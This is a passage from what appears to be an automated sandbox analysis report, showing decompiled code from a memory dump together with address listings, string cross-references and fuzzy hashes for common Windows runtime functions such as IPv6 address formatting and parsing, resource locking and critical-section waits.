						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E022E7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E022F13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E022E7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E022E7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E022B2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E022BE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                    0x022f14c0
                                    0x022f14cb
                                    0x022f14d2
                                    0x022f14d6
                                    0x022f14da
                                    0x022f14de
                                    0x022f14e3
                                    0x022f157a
                                    0x022f157a
                                    0x022f14f1
                                    0x022f14f3
                                    0x0231ea0f
                                    0x00000000
                                    0x0231ea15
                                    0x00000000
                                    0x0231ea15
                                    0x022f14f9
                                    0x022f14f9
                                    0x022f14fe
                                    0x022f1504
                                    0x0231ea1a
                                    0x0231ea1f
                                    0x0231ea21
                                    0x0231ea22
                                    0x0231ea27
                                    0x0231ea2a
                                    0x0231ea2a
                                    0x022f1515
                                    0x022f1517
                                    0x022f156d
                                    0x022f1572
                                    0x022f1575
                                    0x022f1575
                                    0x022f151e
                                    0x0231ea50
                                    0x0231ea55
                                    0x0231ea58
                                    0x0231ea58
                                    0x022f152e
                                    0x022f1531
                                    0x022f1533
                                    0x00000000
                                    0x022f1535
                                    0x022f1541
                                    0x022f1549
                                    0x022f1549
                                    0x022f1533
                                    0x022f14f3
                                    0x022f1559

                                    APIs
                                    • ___swprintf_l.LIBCMT ref: 0231EA22
                                      • Part of subcall function 022F13CB: ___swprintf_l.LIBCMT ref: 022F146B
                                      • Part of subcall function 022F13CB: ___swprintf_l.LIBCMT ref: 022F1490
                                    • ___swprintf_l.LIBCMT ref: 022F156D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    • Associated: 00000007.00000002.2378253920.0000000002290000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378345340.0000000002380000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378351184.0000000002390000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378357251.0000000002394000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378363645.0000000002397000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378369400.00000000023A0000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378402410.0000000002400000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ___swprintf_l
                                    • String ID: %%%u$]:%u
                                    • API String ID: 48624451-3050659472
                                    • Opcode ID: a69d636a76d4bcba3aa7ebcf0f5bb6285c78867fa3d693a668c8472ba64a1c27
                                    • Instruction ID: 034a2825ba76def1e86ddb502db896597d5ca2fb355766df7f6821a654e42c5a
                                    • Opcode Fuzzy Hash: a69d636a76d4bcba3aa7ebcf0f5bb6285c78867fa3d693a668c8472ba64a1c27
                                    • Instruction Fuzzy Hash: 9221C572920219DBDF61DED4CC41AEEB3ACAF10704F844125EE4AE3148DB71AA688BD1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 022D53A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 44%
                                    			E022D53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x023901c0;
									_push(_t92);
									_push(0);
									_t37 = E022AF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E022F4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E02303F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E02303F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0233217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02303F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E022F3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E022D5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E022AF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E022F3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E022AF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E022F3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E022AF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E022F3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E022D5329(_t74, _t92);
													_push(1);
													return E022D53A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

























                                    0x022d53ab
                                    0x022d53ae
                                    0x022d53b1
                                    0x022d53b4
                                    0x022d53b7
                                    0x022f05b6
                                    0x022f05c0
                                    0x022f05c3
                                    0x00000000
                                    0x022f05c9
                                    0x022f05c9
                                    0x022f05cc
                                    0x022f05d5
                                    0x022f05d5
                                    0x022d53bd
                                    0x022d53bd
                                    0x022d53bd
                                    0x022d53be
                                    0x022d53be
                                    0x022d53be
                                    0x022d53c0
                                    0x00000000
                                    0x00000000
                                    0x02312269
                                    0x0231226d
                                    0x02312349
                                    0x0231234d
                                    0x02312273
                                    0x02312276
                                    0x02312279
                                    0x0231227e
                                    0x02312283
                                    0x02312287
                                    0x0231228a
                                    0x0231228d
                                    0x0231228f
                                    0x023122bc
                                    0x023122bc
                                    0x023122bc
                                    0x023122be
                                    0x023122c4
                                    0x023122cc
                                    0x023122d0
                                    0x023122d6
                                    0x023122d7
                                    0x023122da
                                    0x023122df
                                    0x023122e4
                                    0x00000000
                                    0x00000000
                                    0x023122e6
                                    0x023122e9
                                    0x023122f4
                                    0x023122f9
                                    0x023122fa
                                    0x02312305
                                    0x02312314
                                    0x02312319
                                    0x0231231a
                                    0x0231231d
                                    0x02312320
                                    0x02312323
                                    0x02312323
                                    0x02312328
                                    0x0231232d
                                    0x0231232f
                                    0x02312331
                                    0x02312336
                                    0x02312336
                                    0x0231233b
                                    0x0231233d
                                    0x02312350
                                    0x02312351
                                    0x02312356
                                    0x02312359
                                    0x02312359
                                    0x0231235b
                                    0x0231235d
                                    0x022d5367
                                    0x022d536b
                                    0x022d5372
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x02312363
                                    0x02312363
                                    0x02312369
                                    0x0231236a
                                    0x0231236c
                                    0x02312371
                                    0x02312373
                                    0x00000000
                                    0x02312379
                                    0x02312379
                                    0x0231237a
                                    0x0231237f
                                    0x0231237f
                                    0x02312385
                                    0x02312386
                                    0x02312389
                                    0x0231238e
                                    0x02312390
                                    0x022d5378
                                    0x022d537c
                                    0x02312396
                                    0x02312396
                                    0x02312397
                                    0x0231239c
                                    0x023123a2
                                    0x023123a3
                                    0x023123a6
                                    0x023123ab
                                    0x023123ad
                                    0x00000000
                                    0x023123b3
                                    0x023123b3
                                    0x023123b4
                                    0x023123b9
                                    0x023123ba
                                    0x023123ba
                                    0x023123bc
                                    0x023123bf
                                    0x00000000
                                    0x00000000
                                    0x02309153
                                    0x02309158
                                    0x0230915a
                                    0x0230915e
                                    0x02309160
                                    0x00000000
                                    0x02309166
                                    0x02309166
                                    0x02309171
                                    0x02309176
                                    0x02309176
                                    0x00000000
                                    0x02309160
                                    0x023123c6
                                    0x023123cb
                                    0x023123d7
                                    0x023123d7
                                    0x023123ad
                                    0x02312390
                                    0x02312373
                                    0x0231233f
                                    0x0231233f
                                    0x00000000
                                    0x0231233f
                                    0x02312291
                                    0x02312291
                                    0x02312293
                                    0x02312295
                                    0x0231229a
                                    0x023122a1
                                    0x023122a3
                                    0x023122a7
                                    0x023122a9
                                    0x00000000
                                    0x00000000
                                    0x023122ab
                                    0x023122ad
                                    0x023122af
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x023122af
                                    0x023122b1
                                    0x023122b4
                                    0x023122b4
                                    0x023122b6
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x023122b6
                                    0x0231228f
                                    0x00000000
                                    0x0231226d
                                    0x022d53cb
                                    0x022d53ce
                                    0x022d53d0
                                    0x022d53d4
                                    0x022d53d6
                                    0x00000000
                                    0x022d53d8
                                    0x022d53e3
                                    0x022d53ea
                                    0x022d53ea
                                    0x022d53d6
                                    0x00000000

                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023122F4
                                    Strings
                                    • RTL: Re-Waiting, xrefs: 02312328
                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 023122FC
                                    • RTL: Resource at %p, xrefs: 0231230B
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    • Associated: 00000007.00000002.2378253920.0000000002290000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378345340.0000000002380000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378351184.0000000002390000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378357251.0000000002394000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378363645.0000000002397000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378369400.00000000023A0000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378402410.0000000002400000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                    • API String ID: 885266447-871070163
                                    • Opcode ID: 1a7504556d0258b81da9abf751d96fee5655978ffd522f90f532ec4a25ba65cc
                                    • Instruction ID: 2523aac2dcf13f1049b931d98716c50856ad73bf3a2b81ae5b7a4463c62d9323
                                    • Opcode Fuzzy Hash: 1a7504556d0258b81da9abf751d96fee5655978ffd522f90f532ec4a25ba65cc
                                    • Instruction Fuzzy Hash: 7A510A716107116BEB65EBA4CC90FA77399EF44324F104629FD05DF284EBB1E942CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 022DEC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 51%
                                    			E022DEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E022CDA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x239793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E022B16C0(_t39);
				} else {
					_t40 = E022AF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E022F3915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E022B01A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x239793c; // 0x0
								_push(_t85);
								_t44 = E022B1F28(_t71);
							} else {
								_t44 = E022AF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E022F3915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E02332306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E022DEC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E022F4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E02303F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E02303F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x23920c0;
								if(_t85 != 0x23920c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0233217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E02303F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                    0x022dec56
                                    0x022dec56
                                    0x022dec56
                                    0x022dec5c
                                    0x022dec64
                                    0x023123e6
                                    0x023123eb
                                    0x023123eb
                                    0x022dec6a
                                    0x022dec6c
                                    0x022dec6f
                                    0x023123f3
                                    0x023123f8
                                    0x023123fa
                                    0x023123fc
                                    0x022dec75
                                    0x022dec76
                                    0x022dec76
                                    0x022dec7b
                                    0x022dec7c
                                    0x022dec7e
                                    0x02312406
                                    0x02312407
                                    0x0231240c
                                    0x0231240d
                                    0x0231240d
                                    0x0231240d
                                    0x02312414
                                    0x02312417
                                    0x0231241e
                                    0x02312435
                                    0x02312438
                                    0x0231243c
                                    0x0231243f
                                    0x02312442
                                    0x02312443
                                    0x02312446
                                    0x02312449
                                    0x02312453
                                    0x02312455
                                    0x0231245b
                                    0x0231245b
                                    0x022deb99
                                    0x022deb99
                                    0x022deb9c
                                    0x022deb9d
                                    0x022deb9f
                                    0x022deba2
                                    0x02312465
                                    0x0231246b
                                    0x0231246d
                                    0x022deba8
                                    0x022deba9
                                    0x022deba9
                                    0x022debae
                                    0x022debb3
                                    0x022debb9
                                    0x022debbb
                                    0x02312513
                                    0x02312514
                                    0x02312519
                                    0x0231251b
                                    0x022dec2a
                                    0x022dec2d
                                    0x022dec33
                                    0x022dec36
                                    0x022dec3a
                                    0x022dec3e
                                    0x022dec40
                                    0x022dec47
                                    0x022dec47
                                    0x022dec40
                                    0x022b22c6
                                    0x022debc1
                                    0x022debc1
                                    0x022debc5
                                    0x022dec9a
                                    0x022dec9a
                                    0x022debd6
                                    0x022debd6
                                    0x00000000
                                    0x022debbb
                                    0x02312477
                                    0x0231247c
                                    0x02312486
                                    0x0231248b
                                    0x02312496
                                    0x0231249b
                                    0x0231249d
                                    0x023124a0
                                    0x023124a3
                                    0x023124aa
                                    0x023124aa
                                    0x023124a5
                                    0x023124a5
                                    0x023124a5
                                    0x023124ac
                                    0x023124af
                                    0x023124b0
                                    0x023124b3
                                    0x023124b9
                                    0x023124ba
                                    0x023124bb
                                    0x023124c6
                                    0x023124cb
                                    0x023124cd
                                    0x023124d0
                                    0x023124d1
                                    0x023124d4
                                    0x023124d6
                                    0x023124d9
                                    0x023124d9
                                    0x023124dc
                                    0x023124df
                                    0x023124e1
                                    0x023124e7
                                    0x023124e9
                                    0x023124ec
                                    0x023124ef
                                    0x023124f2
                                    0x023124f2
                                    0x023124ef
                                    0x023124e7
                                    0x023124fa
                                    0x023124ff
                                    0x02312501
                                    0x02312503
                                    0x02312506
                                    0x0231250b
                                    0x022deb8c
                                    0x022deb93
                                    0x00000000
                                    0x00000000
                                    0x022deb93
                                    0x00000000
                                    0x022deb99
                                    0x022dec85
                                    0x022dec85
                                    0x022dec85
                                    0x00000000

                                    Strings
                                    • RTL: Re-Waiting, xrefs: 023124FA
                                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0231248D
                                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 023124BD
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    • Associated: 00000007.00000002.2378253920.0000000002290000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378345340.0000000002380000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378351184.0000000002390000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378357251.0000000002394000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378363645.0000000002397000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378369400.00000000023A0000.00000040.00000001.sdmp Download File
                                    • Associated: 00000007.00000002.2378402410.0000000002400000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                    • API String ID: 0-3177188983
                                    • Opcode ID: 95828074d396b9b7c16398a9d47c607e1406fd3b7d7da97982e9648af45aab14
                                    • Instruction ID: e6458271dd17936399490a5696fefac0d5b1d6ca624e94c80587e2ced6ce94ad
                                    • Opcode Fuzzy Hash: 95828074d396b9b7c16398a9d47c607e1406fd3b7d7da97982e9648af45aab14
                                    • Instruction Fuzzy Hash: FC41E670A10314ABD724EFA8CC95FAB77A9EF44720F108A05F9599B2C4D774E941CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 022EFCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E022EFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E022EEE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E022EEE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E022E685D(_t167, 4) == 0) {
								if(E022E685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E022E685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E022E685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E022C8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E022BDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E022EEE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E022EEE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                    0x022efcd1
                                    0x022efcd6
                                    0x022efcd9
                                    0x022efcdc
                                    0x022efcdf
                                    0x022efce2
                                    0x022efce5
                                    0x022efce8
                                    0x022efceb
                                    0x022efced
                                    0x022efced
                                    0x022efcf3
                                    0x00000000
                                    0x00000000
                                    0x022efcfc
                                    0x022efcfe
                                    0x022efdc1
                                    0x0231ecbd
                                    0x00000000
                                    0x0231eccc
                                    0x0231eccc
                                    0x0231ecd2
                                    0x00000000
                                    0x00000000
                                    0x0231ecdf
                                    0x0231ece0
                                    0x0231ece4
